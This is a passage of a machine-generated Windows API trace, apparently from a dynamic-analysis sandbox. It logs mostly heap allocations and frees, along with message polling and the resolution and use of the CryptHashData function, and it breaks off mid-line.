1 [0137.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0137.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0137.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0137.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0137.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0137.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0137.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0137.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0137.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0137.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0137.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0137.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0137.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0137.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0137.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0137.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0137.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0137.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0137.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0137.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0137.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0137.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0137.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0137.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0137.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0137.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0137.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0137.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977908 | out: hHeap=0x970000) returned 1 [0137.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0137.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0137.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0137.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0137.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0137.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0137.642] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0137.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0137.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0137.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0137.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0137.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0137.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0137.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0137.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0137.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0137.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0137.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0137.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0137.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0137.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0137.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0137.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0137.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0137.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0137.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0137.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0137.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0137.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50b60, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0137.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0137.644] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0137.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0137.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0137.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0137.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0137.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0137.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0137.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0137.644] CryptHashData (hHash=0xa87290, pbData=0x2e54d78, dwDataLen=0x3, dwFlags=0x1) returned 1 [0137.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0137.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0137.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0137.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0137.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0137.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0137.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0137.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0137.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0137.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0137.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0137.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0137.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0137.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0137.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0137.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0137.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0137.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0137.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0137.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0137.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0137.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0137.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0137.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0137.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0137.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0137.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0137.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0137.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0137.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0137.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0137.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0137.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0137.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0137.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0137.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0137.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0137.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0137.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0137.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0137.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0137.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0137.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0137.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0137.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0137.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0137.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0137.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0137.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0137.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0137.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0137.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0137.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0137.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0137.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0137.647] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0137.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0137.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0137.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0137.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0137.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0137.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0137.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0137.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0137.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0137.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0137.647] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0137.647] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0137.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0137.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0137.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0137.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0137.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0137.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0137.647] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0137.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0137.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0137.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a88 [0137.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0137.648] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0137.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0137.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0137.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0137.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0137.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0137.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0137.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0137.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0137.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0137.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0137.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0137.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0137.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0137.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0137.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0137.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0137.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0137.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0137.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0137.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0137.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0137.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0137.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0137.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0137.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0137.649] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0137.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0137.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0137.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509e0 [0137.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0137.649] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0137.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0137.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0137.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0137.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0137.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0137.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0137.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0137.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0137.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0137.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0137.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0137.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0137.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0137.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0137.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0137.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0137.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0137.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0137.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0137.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0137.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0137.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0137.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0137.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0137.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0137.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0137.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0137.651] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0137.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0137.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0137.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0137.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0137.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0137.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0137.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0137.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0137.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0137.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0137.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0137.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0137.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0137.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0137.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0137.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0137.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0137.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0137.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0137.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0137.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0137.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0137.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0137.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0137.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0137.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0137.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0137.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0137.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0137.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0137.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0137.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0137.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0137.652] WideCharToMultiByte (in: 